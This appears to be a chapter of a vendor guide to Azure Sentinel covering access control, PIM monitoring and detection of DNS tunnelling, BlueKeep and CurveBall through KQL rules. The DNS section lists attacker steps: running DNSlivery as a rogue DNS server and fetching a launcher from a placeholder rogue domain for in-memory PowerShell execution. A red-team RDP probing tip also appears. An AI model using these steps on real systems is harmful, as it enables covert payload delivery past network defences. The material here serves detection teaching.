DESIGN CONSIDERATION: What process do I need to run my Security Operations Center (SOC)? Which tools will support my Service Levels?

One of the options available to you out-of-the-box to automate the follow-up of alerts are Playbooks. In essence, these are Azure Logic Apps that can be triggered whenever a certain condition is met. For instance, an Alert with a high severity gets raised by Azure Sentinel, and you want to send this to a security engineer via text message. The logic app could contain code that connects to Twilio and sends the Alert description to a specified phone number. You can read about it in another chapter.
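The routing decision such a Playbook makes can be reduced to a small piece of logic. The Python below is purely illustrative; the channel names, thresholds and SLA figures are made up, and in practice this logic would live in a Logic App or in an escalation tool:

```python
def route_alert(severity, minutes_open, sla_minutes=60):
    """Decide which notification channels an alert should go to.

    severity: 'Low' | 'Medium' | 'High'
    minutes_open: how long the alert has been unacknowledged
    """
    channels = ["ticket"]                      # every alert becomes a ticket
    if severity == "High":
        channels.append("sms-engineer")        # page the on-call engineer
    if minutes_open >= sla_minutes * 0.8:
        channels.append("notify-management")   # approaching SLA breach
    if minutes_open >= sla_minutes:
        channels.append("escalate-tier2")      # SLA breached: next engineer
    return channels

print(route_alert("High", 10))   # fresh high-severity alert
print(route_alert("High", 65))   # unacknowledged past the SLA
```

In a real deployment, the acknowledgement check and two-way communication would come from the notification service itself rather than from a function like this.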

How do I know the security engineer has read it? What if he or she didn’t, and we need to escalate to the next engineer? Or worse yet, we’re approaching SLA times and we need to start informing management. This is where 3rd party solutions like SIGNL4 come in.

There are a few out there, but SIGNL4 is great because it is a cloud service where you can set escalation paths, do two-way communication (to receive acknowledgement), use multiple channels (persistent push, text and voice) and log the audit trail. They also support duty scheduling and have a 2-tier escalation model.


10.9 Key takeaway
The key takeaway is that while Azure Sentinel is software-as-a-service, you should still plan for the implementation of the service. Gather your business and CISO requirements and consider for each subject what you should do. Also, don’t forget that it is not only a technical deployment; you will need to plan for the process side as well.

11. Access and authorization.

Let’s assume you’ve successfully deployed Azure Sentinel and are collecting data and using it for monitoring and hunting purposes. Quickly after, your company’s privacy officer or auditor points out that both the law (for instance: GDPR & AVG) and the company’s requirements don’t allow all admins to have access all the time to all of that personally identifiable data.

You need to come up with a solution to design access to Azure Sentinel in a way that the SecOps people can work with the alerts, the SIEM admins can create or modify rules, and that hunters can sift through all the data to find what they are looking for. How should you do that? In this chapter I’ll share some considerations.

11.1 Azure Log Analytics
Azure Sentinel uses a Log Analytics workspace to store its data. Recently, Microsoft introduced a more granular role-based access model for Log Analytics. Previously, we only had the workspace-context access mode, but now we also have a resource-context access mode. For each Log Analytics workspace you can choose the desired access mode.

Resource-context access mode allows you to set permissions all the way down to individual tables in the Log Analytics workspace, aka Table Level RBAC.

You can change the current workspace access control mode from the Properties page of the workspace, which can be found under the Workspace settings node in the Azure Sentinel UI. (Changing the setting will be disabled if you don’t have permissions to configure the workspace.)

PRO TIP: Want to quickly know if your Log Analytics workspace is enabled for resource-context access mode? Run this PowerShell command:

Get-AzResource -ResourceType Microsoft.OperationalInsights/workspaces -ExpandProperties | foreach {$_.Name + ": " + $_.Properties.features.enableLogAccessUsingOnlyResourcePermissions}

PRO TIP: Want to enable resource-context permissions for all your workspaces? Run this script:

Get-AzResource -ResourceType Microsoft.OperationalInsights/workspaces -ExpandProperties | foreach {
    if ($_.Properties.features.enableLogAccessUsingOnlyResourcePermissions -eq $null) {
        $_.Properties.features | Add-Member enableLogAccessUsingOnlyResourcePermissions $true -Force
    } else {
        $_.Properties.features.enableLogAccessUsingOnlyResourcePermissions = $true
    }
    Set-AzResource -ResourceId $_.ResourceId -Properties $_.Properties -Force
}

11.2 Azure Active Directory
Because Azure Sentinel uses Log Analytics, part of the Azure platform, as its backend, it also uses Azure Active Directory for its identities. Azure has two built-in user roles for Log Analytics workspaces: Log Analytics Reader and Log Analytics Contributor.

Members of the Log Analytics Reader role can:

° View and search all monitoring data
° View monitoring settings, including viewing the configuration of Azure diagnostics on all Azure resources.

Members of the Log Analytics Contributor role can:

° Read all monitoring data as Log Analytics Reader can
° Create and configure Automation accounts
° Add and remove solutions
° Read storage account keys
° Configure collection of logs from Azure Storage
° Edit monitoring settings for Azure resources

These roles can be given to users at different scopes:

° Subscription — Access to all workspaces in the subscription
° Resource Group — Access to all workspaces in the resource group
° Resource — Access to only the specified workspace

11.3 Custom roles If the built-in roles don’t meet the specific needs of your enterprise, you can create your own custom roles. Just like built-in roles, you can assign custom roles to users, groups, and service principals at subscription, resource group, and resource scopes.

You implement table access control with Azure custom roles to either grant or deny access to specific tables in the workspace. These roles are applied to workspaces with either workspace-context or resource-context access control modes regardless of the user’s access mode.

Create a custom role with the following actions to define table access control:

° To grant access to a table, include it in the Actions section of the role definition.
° To deny access to a table, include it in the NotActions section of the role definition.
° Use * to specify all tables.

PRO TIP: Custom roles are stored in an Azure Active Directory (Azure AD) directory and can be shared across subscriptions. Each directory can have up to 5000 custom roles. (For specialized clouds, such as Azure Government, Azure Germany, and Azure China 21Vianet, the limit is 2000 custom roles.)

For example, to create a SecOps role for investigations with access only to the SecurityAlert and AzureActivity tables, create a custom role as follows:

{
  "Name": "SecOps investigator",
  "Id": "88888888-8888-8888-8888-888888888888",
  "IsCustom": true,
  "Description": "Can access security alerts and query the azure activities for a user.",
  "Actions": [
    "Microsoft.OperationalInsights/workspaces/query/SecurityAlerts/read",
    "Microsoft.OperationalInsights/workspaces/query/AzureActivity/read"
  ],
  "NotActions": [],
  "DataActions": [],
  "NotDataActions": [],
  "AssignableScopes": [
    "/subscriptions/{subscriptionId1}",
    "/subscriptions/{subscriptionId2}"
  ]
}

11.4 Custom Logs
You can’t currently grant or deny access to individual custom logs, but you can grant or deny access to all custom logs. To create a role with access to all custom logs, create a custom role using the following actions:

"Actions": ["Microsoft.OperationalInsights/workspaces/query/Tables.Custom/read"],

11.5 Key takeaways
° If a user is granted global read permission with the standard Reader or Contributor roles that include the read action, it will override the per-table access control and give them access to all log data.
° If a user is granted per-table access but no other permissions, they would be able to access log data from the API but not from the Azure portal. To provide access from the Azure portal, take the actions from the Log Analytics Reader role into your custom role.
° Administrators of the subscription will have access to all data types regardless of any other permission settings.

° Workspace owners are treated like any other user for per-table access control.
° You should assign roles to security groups instead of individual users to reduce the number of assignments. This will also help you use existing group management tools to configure and verify access.

PRO TIP: Unsure who has what access? Use the ‘Access control (IAM)’ node from the Advanced Settings pane of your Log Analytics workspace to find out.

11.6 Privileged Identity Management Azure AD Privileged Identity Management (PIM) enables you to set up IAM in a way that users and accounts don’t carry the required roles and permissions all the time.

Accounts are enabled ahead of time to request a certain role. When they want to use that role, they put in a just-in-time request specifying how long they need it and, depending on the configuration in PIM, that request can then be evaluated and granted or denied. The great thing is that Azure AD PIM also works for custom roles.

An example would be where a Threat Hunter would use a regular Azure AD account and then go to the PIM interface to request the SecOps investigator role to access all the required information in Azure Sentinel for his or her investigation.

PRO TIP: Azure AD PIM is a premium feature in Azure. You need either an Azure AD P2 license for the user that needs PIM functionality, or license it through an EMS E5 or Microsoft 365 E5 license.

11.7 Monitoring PIM usage
Most enterprises and auditors will also require you to monitor that role usage. This can easily be done using the Azure AD audit logs. Make sure you enable the Azure Active Directory connector in Azure Sentinel so that the data type ‘AuditLogs’ is collected. The PIM operations are stored in the AuditLogs table. You need to filter on the category ‘ResourceManagement’ and an operation name containing ‘PIM’. Here’s a base KQL query for hunting:

AuditLogs
| where Category == "ResourceManagement" and OperationName contains "PIM"
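The same filter is easy to prototype outside of Sentinel, for instance when testing against exported logs. A Python sketch, where the sample records are invented and shaped loosely after the AuditLogs columns used in the query:

```python
def pim_operations(audit_logs):
    """Return audit records matching the KQL filter:
    Category == 'ResourceManagement' and OperationName contains 'PIM'."""
    return [
        rec for rec in audit_logs
        if rec.get("Category") == "ResourceManagement"
        and "PIM" in rec.get("OperationName", "")
    ]

# Invented records shaped like rows from the AuditLogs table:
logs = [
    {"Category": "ResourceManagement", "OperationName": "PIM activation requested"},
    {"Category": "UserManagement", "OperationName": "Update user"},
    {"Category": "ResourceManagement", "OperationName": "Add role assignment"},
]
hits = pim_operations(logs)
print(len(hits))
```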

You could use a similar query to create a rule to alert the SOC when that role is being used.

12. Putting it all together.

Now that we’ve discussed all elements of Azure Sentinel, it’s time to put it all together and build some Use Cases. In this chapter you’ll find three use cases.

12.1 Use Case 1: Detect DNS tunneling No matter how tightly you control your network, you probably allow DNS queries and UDP 53 traffic on your network.

Bad actors can abuse this to establish a stealthy command & control (C2) channel and/or exfiltrate data using DNS tunneling.

Azure Sentinel can help detect these types of attacks and provide insight into the various stages of the attacker’s kill chain.

12.1.1 Delivering a payload over DNS On GitHub you can find a project called DNSlivery that aims to deliver payloads over DNS. It is a lightweight solution built on Python and the Scapy library. No need for a full-fledged DNS server, DNSlivery will listen on UDP 53 and serve the payload through TXT records.
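The core trick behind serving files over DNS is simple: base64-encode the payload and slice it into chunks that fit within a TXT record string (at most 255 bytes each). The Python sketch below illustrates that round trip; it is a simplified illustration of the concept, not DNSlivery’s actual code:

```python
import base64

def to_txt_records(payload: bytes, chunk_size: int = 255):
    """Base64-encode a payload and slice it into TXT-record-sized strings."""
    encoded = base64.b64encode(payload).decode("ascii")
    return [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]

def from_txt_records(records):
    """Reassemble and decode the chunks on the receiving side."""
    return base64.b64decode("".join(records))

payload = b"ASCII cat goes here" * 50        # stand-in for atp-cat.txt
records = to_txt_records(payload)
assert from_txt_records(records) == payload  # lossless round trip
print(f"{len(payload)} bytes -> {len(records)} TXT records")
```

The receiving side only has to request the records in order, concatenate the strings and base64-decode them, which is exactly what a small PowerShell launcher can do natively.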

12.1.2 Use DNSlivery to bootstrap DNS tunnelling
How is DNSlivery different from, for instance, PowerDNS? With DNSlivery there is no need for a client on the target; you can just use native PowerShell in the operating system. However, this does mean that it is one-way communication. But because it does not touch disk, it can help bootstrap the next phase of your attack, DNS tunneling:

“Even though more complete DNS tunneling tools already exist (fi: dnscat2 and iodine), they all require to run a dedicated client on the target. The problem is that there is probably no other way than DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools requires to already have a DNS communication channel.

In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.”

12.1.3 Setting up the DNS server You will of course need a domain name and be able to change and administer the NS records. Point the NS record(s) to the external IP of the machine you’ll be using for this.

To set up the rogue DNS server itself you need a Linux operating system instance. You will also need Python3 and the right version of the Scapy library (v2.4.0). DNSlivery makes things easy for you, just run these commands:

git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery
sudo pip install -r requirements.txt

Create a directory on disk that has the file that contains the payload you want to serve over DNS. In this sample we’ll be serving “atp-cat.txt” with an ASCII picture of a cat.

Run the following command:

sudo python3 dnslivery.py -p /path/to/the/payload

12.1.4 Consuming the payload on the target
As mentioned earlier, DNSlivery is different from other solutions in that it does not require a dedicated client. The content can be consumed by PowerShell out of the box.

On the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record:

nslookup -type=txt atp-cat-txt.print.yourroguedomain.net

Copy and paste the response into the PowerShell console again, to retrieve the payload over DNS:


12.1.5 How can I defend against these types of attacks? While most companies will have some form of network security solution in place that might already trigger on these types of attacks, Azure Sentinel can also play a role in detecting this malicious intent.

Looking at the Security eventlog on this specific server we find an event with ID 4688 that shows us the execution of the initial ‘nslookup’.

If we execute a Kusto (KQL) query on the Log Analytics workspace that this agent is connected to, we quickly find the event:

SecurityEvent
| search "nslookup" and "TXT"

12.1.6 Capturing the malicious transfer itself When we dig further, there is no logged event in the Windows security eventlog on the next stage of the attack that receives the multi-part base64 encoded payload. Because it uses Invoke-Expression (IEX) it does not spawn a new (child) process and therefore no extra event is created in the security eventlog.

However, we can use the DNS client logging in Windows. That is not enabled by default, but enterprises could (and should?) enable this.

12.1.7 Collecting the DNS client log
Going into Workspace Settings in Azure Sentinel, you will find the Advanced Settings of the associated Log Analytics workspace, which will allow you to collect the DNS client log. It will take a couple of minutes to start gathering and processing this new log, but directly afterwards you can query the data in Kusto format, returning the malicious command:

Event
| where EventLog == "Microsoft-Windows-DNS-Client/Operational"
| where RenderedDescription contains "type 16"

12.1.8 Azure Sentinel The next step is to create a Case trigger in Azure Sentinel. This can be done through the ‘Analytics’ section. Here are the properties you can use:

• Status: Enabled
• Name: Potential DNS tunnelling
• Description: We've found a large number of DNS queries for TXT records in a short period, which might indicate malicious DNS tunnelling
• Severity: High
• Alert Query:
Event
| where EventLog == "Microsoft-Windows-DNS-Client/Operational"
| where RenderedDescription contains "type 16"
| extend HostCustomEntity = Computer
• Entity mapping:
- Account:
- Host: Computer
- IP address:
• Operator: Number of results greater than: 5
• Alert Scheduling:
- Frequency: 5 minutes
- Period: 5 minutes
• Alert suppression: On (for 60 minutes)

PRO TIP: Make sure you map the entities as part of the rule creation — this is a very important step since this will support the investigation.

12.1.9 Incidents
Now that we have created an advanced alert rule in Azure Sentinel, it will generate Incidents that you can assign and use to investigate deeply. An incident can include multiple alerts. It’s an aggregation of all the relevant evidence for a specific investigation. In the Entities tab, you can see all the entities that are involved.
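The detection logic from this use case (more than five TXT-record queries from one host within five minutes) can be prototyped outside of Sentinel as well. A Python sketch over invented DNS-client events:

```python
from collections import defaultdict

def txt_burst_hosts(events, threshold=5, window_seconds=300):
    """Flag hosts that issue more than `threshold` TXT-record DNS queries
    within a sliding time window, mirroring the alert rule above.

    events: iterable of (timestamp_seconds, host, query_type), sorted per host.
    """
    flagged = set()
    per_host = defaultdict(list)
    for ts, host, qtype in events:
        if qtype != "TXT":
            continue
        times = per_host[host]
        times.append(ts)
        # drop queries that fell outside the window
        while times and ts - times[0] > window_seconds:
            times.pop(0)
        if len(times) > threshold:
            flagged.add(host)
    return flagged

# Invented telemetry: host "pc-042" fires 6 TXT queries in under a minute.
events = [(i * 10, "pc-042", "TXT") for i in range(6)] + [(30, "pc-007", "A")]
flagged_hosts = txt_burst_hosts(events)
print(flagged_hosts)
```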

12.1.10 Conclusion A potentially better approach for enterprises is to block DNS port 53 traffic at the edge by default. This ensures that all port 53 traffic has to go out via the corporate DNS servers, providing a central point for logging. At that point it is sufficient to do centralized logging on the DNS server itself.

Without central logging, or if you do allow DNS traffic at the edge, client-level logging is valuable for detecting DNS tunneling attacks. Client-level logging also means you directly get the name of the impacted host in the logs, which is an added value for Threat Hunting.

While DNS client logging wasn’t there out-of-the-box, Azure Sentinel makes it easy to start detecting the DNS attack vector.

12.2 Use Case 2: Detect CVE-2019-0708 aka BlueKeep On May 14th 2019, Microsoft’s Security Response Center issued guidance that a vulnerability was found in Remote Desktop Services, formerly known as Terminal Services, allowing an unauthenticated hacker to execute code on the target system. Windows 7, Windows Server 2008 and 2008 R2 are affected.

Microsoft issued a fix and advised to patch directly because the vulnerability is ‘wormable’ and to prevent a situation such as with WannaCry and others. Underlining the importance of the CVE is the fact that Microsoft backported the fix to Windows XP and Windows Server 2003. The vulnerability was nicknamed BlueKeep in the infosec community.

12.2.1 Patch Management is still a number 1 priority
A good patch management strategy is commonly listed as one of the basics of an organizational cybersecurity strategy. Unfortunately, we still see companies not regularly patching their systems. There are a number of reasons for this: a lack of technical staff can make updating a little scary, undermanned IT staff can become busy with problems perceived to be ‘more important’, and an often-heard answer is that some updates can cause performance issues or ‘break stuff’. Regardless of the reasons why an organization may procrastinate when it comes to patching, it’s a critical process that needs to be in place.

The good news is that Microsoft Azure provides Update Management as a service. It’s technically part of Azure Automation and uses the Microsoft Monitoring Agent on your servers (which will likely already be there for monitoring, security management and other tasks) to report status and execute the fixes. If you’re in a hybrid world and want to cover your on-premises servers, Microsoft’s System Center Configuration Manager (SCCM) together with Microsoft Intune is a great option as well.

12.2.2 Microsoft Defender ATP knows more about the CVE When a CVE is reported, one of the first things you’ll likely be doing is searching for more background information on this exploit. A good starting point could be the article that MSRC issued, or the corresponding document on MITRE’s website.

But if you’re using Microsoft Defender ATP, there is a section called Threat Analytics where the MDATP team regularly posts important information. On the day MSRC issued the guidance, the MDATP team put up an article about the CVE called “Wormable RCE vulnerability in RDP”. It has key insights, tasks that can be used for mitigation, links to the fixes, and much more. The best part though are the integrated dashboards: the page shows you which machines in your environment are exploitable.


The MDATP team also provides a KQL query that can identify machines with relatively intense outbound network activity on the common RDP port (TCP 3389), which you can use to find processes that might be scanning for possible targets or exhibiting worm-like behavior:

let listMachines = MachineInfo
| where OsVersion == "6.1" // Win7 and Srv2008
| distinct MachineId;
NetworkCommunicationEvents
| where RemotePort == 3389
| where Protocol == "Tcp" and ActionType == "ConnectionSuccess"
| where InitiatingProcessFileName !in~ // filter some legit programs
    ("mstsc.exe", "RTSApp.exe", "RTS2App.exe", "RDCMan.exe",
    "ws_TunnelService.exe", "RSSensor.exe",
    "RemoteDesktopManagerFree.exe", "RemoteDesktopManager.exe",
    "RemoteDesktopManager64.exe", "mRemoteNG.exe", "mRemote.exe",
    "Terminals.exe", "spiceworks-finder.exe",
    "FSDiscovery.exe", "FSAssessment.exe")
| join listMachines on MachineId
| project EventTime, MachineId, ComputerName, RemoteIP, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessSHA1
| summarize conn=count() by MachineId, InitiatingProcessFileName, bin(EventTime, 1d)

12.2.3 How many systems are vulnerable?

A quick query on Shodan reveals that there are at least 2 million machines connected to the internet that publicly expose RDP on the default port of 3389. Most of them are in the US and China, and about 130K of them are hosted on Amazon AWS. At the time of writing, around 950K of them are vulnerable to BlueKeep.
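To make the logic of the MDATP hunting query shown earlier concrete, here is a minimal Python sketch (an illustration only, not part of MDATP) that applies the same heuristic to hypothetical connection-event records: keep successful outbound TCP connections to port 3389 whose initiating process is not a known RDP administration tool, then count connections per machine. The field names mirror the KQL table columns; the allow-list is a shortened, assumed subset.

```python
from collections import Counter

# Assumed allow-list, mirroring (a subset of) the filter in the KQL query.
LEGIT_RDP_TOOLS = {
    "mstsc.exe", "rdcman.exe", "mremoteng.exe", "mremote.exe",
    "terminals.exe", "remotedesktopmanager.exe",
}

def suspicious_rdp_counts(events):
    """Count outbound TCP/3389 connections per machine, excluding
    connections made by known RDP administration tools."""
    counts = Counter()
    for e in events:
        if (e["RemotePort"] == 3389
                and e["Protocol"] == "Tcp"
                and e["ActionType"] == "ConnectionSuccess"
                and e["InitiatingProcessFileName"].lower() not in LEGIT_RDP_TOOLS):
            counts[e["MachineId"]] += 1
    return counts
```

A machine showing hundreds of such connections per day would be a candidate for investigation as a possible scanner or worm-infected host.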

GreyNoise is actively monitoring and observed sweeping tests for systems vulnerable to BlueKeep during the summer of 2019 from several dozen hosts around the Internet. Interesting fact: that activity has been observed exclusively from TOR exit nodes and is likely being executed by a single actor.

Besides disabling RDP and port 3389 when it's not needed, another important workaround would be to enable Network Level Authentication (NLA) on systems running Windows 7, Windows Server 2008 and 2008 R2. With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.

PRO TIP Are you red teaming and want to get more information on the OS/system you are connecting to? If you get prompted for a login for RDP before the login screen, enter .\guest with no password and it bumps you to the login screen.

12.2.4 Azure Cloud Shell & PowerShell can help

Now, if you're running your Windows VMs in Azure, you might want to have a look at your Network Security Groups (NSGs). This is the time where you will want to evaluate if having that port 3389 opened up to the internet is a good idea. (Answer: nope.)

Here's a PowerShell script that checks all of your Azure subscriptions and, for each, queries all the NSGs to see if 3389 is open:

$subs = az account list --query "[].id" -o tsv
foreach ($sub in $subs) {
    az account set -s $sub
    $nsgList = az network nsg list --query "[].{Name:name, ResourceGroup:resourceGroup}" | ConvertFrom-Json
    foreach ($nsg in $nsgList) {
        $rules = az network nsg rule list --nsg-name $nsg.Name -g $nsg.ResourceGroup --query "[?destinationPortRange=='3389'].{Name:name, ResourceGroup:resourceGroup}" | ConvertFrom-Json
        $rules
    }
}
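If you prefer to post-process the CLI output yourself, the same check can be sketched in Python. This is illustrative only; it assumes you feed it the parsed JSON from `az network nsg rule list`, whose objects carry `name`, `direction`, `access` and `destinationPortRange` fields, and it also flags port ranges that merely cover 3389:

```python
def rules_exposing_rdp(rules):
    """Return the names of inbound allow rules whose destination
    port range is exactly 3389, a wildcard, or a range covering 3389."""
    exposed = []
    for r in rules:
        if r.get("direction") != "Inbound" or r.get("access") != "Allow":
            continue
        port_range = str(r.get("destinationPortRange", ""))
        if port_range in ("3389", "*"):
            exposed.append(r["name"])
        elif "-" in port_range:
            lo, hi = port_range.split("-")
            if int(lo) <= 3389 <= int(hi):
                exposed.append(r["name"])
    return exposed
```

Unlike the JMESPath filter above, this variant also catches rules that open a broad range such as 3000-4000, which equally exposes RDP.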

PRO TIP Another option to look at is the just-released 'Adaptive Network Hardening' feature of Azure Security Center. It learns the network traffic and connectivity patterns of your Azure workloads and provides you with NSG rule recommendations for your internet-facing virtual machines.

PRO TIP You can use Azure Cloud Shell to run this script!


12.2.5 InfoSec community at work

The bigger danger at this stage is the exploitation of CVE-2019-0708 once inside the organization, to quickly compromise hosts and move laterally. And since the first real proof-of-concept exploit is publicly out there, we will leverage Azure Sentinel to build detection for BlueKeep.

So how do you start detecting potential BlueKeep-related behavior? Markus Neis at Swisscom shared a Sigma rule on GitHub addressing Lateral Movement technique T1210 (Exploitation of Remote Services) within 24 hours of the CVE becoming public knowledge. The same day, SOC Prime's Roman Ranskyi also published a Sigma rule with detection logic extending to Masquerading technique T1036 and Network Service Scanning technique T1046.

Recently, someone by the name of Adam also shared his findings that account name AAAAAAA in a 4625 Windows Event is a potential indicator of people downloading a BlueKeep scanner from GitHub and running it without modification against an RDP server.


12.2.6 How to detect BlueKeep exploit usage in Azure Sentinel

Azure Sentinel can help detect BlueKeep. By sourcing information from the Graph Security API, Azure Security Center, and many other sources, Microsoft's cloud SIEM can provide detection. Using the combined knowledge of the InfoSec community, it is easy to add the appropriate Alert Rules.

Here's the KQL query to detect suspicious outbound RDP connections. It detects non-standard tools connecting to TCP port 3389, indicating possible lateral movement:

Event
| parse EventData with * 'Data Name="RuleName">' RuleName '<' *
    'Data Name="UtcTime">' UtcTime '<' *
    'Data Name="ProcessGuid">' ProcessGuid '<' *
    'Data Name="ProcessId">' ProcessId '<' *
    'Data Name="Image">' Image '<' *
    'Data Name="User">' User '<' *
    'Data Name="Protocol">' Protocol '<' *
    'Data Name="Initiated">' Initiated '<' *
    'Data Name="SourceIsIpv6">' SourceIsIpv6 '<' *
    'Data Name="SourceIp">' SourceIp '<' *
    'Data Name="SourceHostname">' SourceHostname '<' *
    'Data Name="SourcePort">' SourcePort '<' *
    'Data Name="SourcePortName">' SourcePortName '<' *
    'Data Name="DestinationIsIpv6">' DestinationIsIpv6 '<' *
    'Data Name="DestinationIp">' DestinationIp '<' *
    'Data Name="DestinationHostname">' DestinationHostname '<' *
    'Data Name="DestinationPort">' DestinationPort '<' *
    'Data Name="DestinationPortName">' DestinationPortName '<' *
| where (EventID == "3" and DestinationPort == "3389")
    and not (Image endswith "\\mstsc.exe"
        or Image endswith "\\RTSApp.exe"
        or Image endswith "\\RTS2App.exe"
        or Image endswith "\\RDCMan.exe"
        or Image endswith "\\ws_TunnelService.exe"
        or Image endswith "\\RSSensor.exe"
        or Image endswith "\\RemoteDesktopManagerFree.exe"
        or Image endswith "\\RemoteDesktopManager.exe"
        or Image endswith "\\RemoteDesktopManager64.exe"
        or Image endswith "\\mRemoteNG.exe"
        or Image endswith "\\mRemote.exe"
        or Image endswith "\\Terminals.exe"
        or Image endswith "\\spiceworks-finder.exe"
        or Image endswith "\\FSDiscovery.exe"
        or Image endswith "\\FSAssessment.exe"
        or Image endswith "\\MobaRTE.exe"
        or Image endswith "\\chrome.exe")

PRO TIP You will need to have SwiftOnSecurity's Sysmon configuration installed on the RDP and Terminal Services machines you will be protecting and monitoring.

Here's the KQL query to detect the use of a scanner by zerosum0x0 that discovers targets vulnerable to BlueKeep:

SecurityEvent
| where EventID == "4625" and AccountName == "AAAAAAA"


12.2.7 What to do as a defender?

Considering all the above, the top 3 things you can do as a defender are:

1. Deploy proactive detection.
2. Rigorously patch or mitigate the vulnerability.
3. Keep track of how the situation develops, following input from researchers you trust.

Microsoft security really is more than 1 plus 1. When using a combination of Azure Sentinel, Azure Security Center, Microsoft Defender ATP, and Microsoft Intune, you get an integrated approach to protecting, detecting and responding to threats like BlueKeep.

12.3 Use Case 3: Detect CurveBall

In January 2020, Microsoft released a security update for Windows which includes a fix for a dangerous bug that would allow an attacker to spoof a certificate, making it look like it came from a trusted source.

The vulnerability (CVE-2020-0601) was reported to Microsoft by the NSA. The root cause of this vulnerability is a flawed implementation of Elliptic Curve Cryptography (ECC) within Microsoft's code.

Tal Be’ery, Microsoft’s security research manager, wrote an article explaining the root cause of the vulnerability using a Load Bearing analogy.

12.3.1 Watching the logs

Windows has a function called CveEventWrite for publishing events when an attempted exploit of a security vulnerability is detected in a user-mode application. To my knowledge, the fix for CVE-2020-0601 is the first code to call this API. After the Windows update is applied and the machine rebooted, the system will generate event ID 1 in the event log under Windows Logs, Application when an attempt to exploit a known vulnerability is detected. This event is raised by a user-mode process, and more information can be found in the MSRC guidance for this fix.

12.3.2 Azure Sentinel By default the Log Analytics workspace powering Azure Sentinel will not collect events from the Application eventlog. You can change this by going to the Advanced Settings for your workspace, and adding Application as a source under Data, Windows Event Logs:

There are two ways of going about creating the Rule. Either you set up detection for event ID 1 in general so that you get alerted for any (future) CVE abuse, or you set up specific rules per CVE.

There are pros and cons to both approaches. In this sample we'll build a specific Rule to detect potential CVE-2020-0601 abuse so that we can map it to the right MITRE tactics and follow it specifically.


12.3.3 Alert rule

Pete Bryan, who works at Microsoft's Threat Intelligence Center (MSTIC), shared a sample KQL query that you can use:

Event
| where Source == "Microsoft-Windows-Audit-CVE"
| where EventID == "1"
| where RenderedDescription contains "CVE-2020-0601"
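The filter logic of this rule is easy to reason about outside of KQL as well. Here is a minimal Python sketch (illustrative only; the record layout mimics the Log Analytics Event table fields used in the query):

```python
def is_curveball_event(record):
    """Return True for Windows CVE audit events that reference
    CVE-2020-0601, mirroring the KQL alert rule."""
    return (record.get("Source") == "Microsoft-Windows-Audit-CVE"
            and str(record.get("EventID")) == "1"
            and "CVE-2020-0601" in record.get("RenderedDescription", ""))
```

A generic variant would drop the last condition and alert on any Microsoft-Windows-Audit-CVE event, trading MITRE-tactic specificity for future-proofing, which is exactly the trade-off discussed above.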

Based on my own investigation, these MITRE TTPs would be most applicable:

° T1036 — In case of fake certificates on binaries ° T1189 — In case of man-in-the-middle type of attacks ° T1116 — In case of code signing abuse

That means that we’ll be tagging the rule for Defense Evasion and Initial Access tactics.


12.3.4 AzSentinel PowerShell

If you want to programmatically push this rule into your Azure Sentinel environment, have a look at Wortell's AzSentinel PowerShell module. You can find more details about it in a previous chapter.

12.3.5 Microsoft Defender ATP

If you have Microsoft Defender ATP deployed across your enterprise (which now also supports macOS), you will get the detection out of the box. The logic was added to MDATP at the same time that Microsoft released the fix.

And because MDATP is now unified with the other Microsoft ATP products, the detection will also show up in the new Microsoft Threat Protection (MTP):


PRO TIP Microsoft Defender ATP can also be deployed on servers. For workloads living in Azure: enable Azure Security Center (standard) and the MDATP client will be deployed and configured automatically.

12.3.6 Analyzing your enterprise for CVE-2020-0601 attacks

The Microsoft Defender team also added a dashboard in the Threat Analytics section of MDATP. The dashboard shows you more information about the CVE and whether or not endpoints in your organization were found to have been potentially abused.

Microsoft also released a hunting query that you can use to investigate. Here's the KQL:

DeviceFileCertificateInfoBeta
| where Timestamp > ago(30d)
| where IsSigned == 1 and IsTrusted == 1 and IsRootSignerMicrosoft == 1
| where SignatureType == "Embedded"
| where Issuer !startswith "Microsoft" and Issuer !startswith "Windows"
| project Timestamp, DeviceName, SHA1, Issuer, IssuerHash, Signer, SignerHash, CertificateCreationTime, CertificateExpirationTime, CrlDistributionPointUrls
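The core idea of this hunting query (an embedded signature that chains to a Microsoft root certificate while the issuer name is not a Microsoft one) can be sketched in Python over hypothetical certificate-info records. The field names follow the KQL table; the records themselves are illustrative:

```python
def suspicious_certs(records):
    """Flag files whose embedded signature chains to a Microsoft
    root certificate while the issuer name is not Microsoft's own:
    the anomaly hunted for in the CVE-2020-0601 query."""
    hits = []
    for r in records:
        if (r["IsSigned"] and r["IsTrusted"] and r["IsRootSignerMicrosoft"]
                and r["SignatureType"] == "Embedded"
                and not r["Issuer"].startswith(("Microsoft", "Windows"))):
            hits.append(r["SHA1"])
    return hits
```

A legitimate binary whose chain ends in a Microsoft root will normally carry a Microsoft or Windows issuer name; a spoofed ECC certificate will not, which is why this simple string check surfaces candidates for investigation.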

12.3.7 Best of suite

If you have MDATP and/or MTP, there is no need to create the Azure Sentinel rule(s). Just enable the Microsoft Defender ATP connector in Azure Sentinel and the alert will be created automatically.

Wortell MDR.


Wortell operates its own security operations center (SOC), which offers 24x7 managed detection and response (MDR) services based on Azure Sentinel and the Microsoft Threat Protection suite.

24x7 MDR as-a-service

Our 24x7 service combines signals from the Microsoft security solutions with information from our in-house built platform, which among other things leverages a honeypot network, and distills this into Use Cases.

These Use Cases can be generic, such as monitoring for 'lateral movement', but they can also be specific and tailored to your organization, such as extra monitoring for your most important data and resources.

We empower people.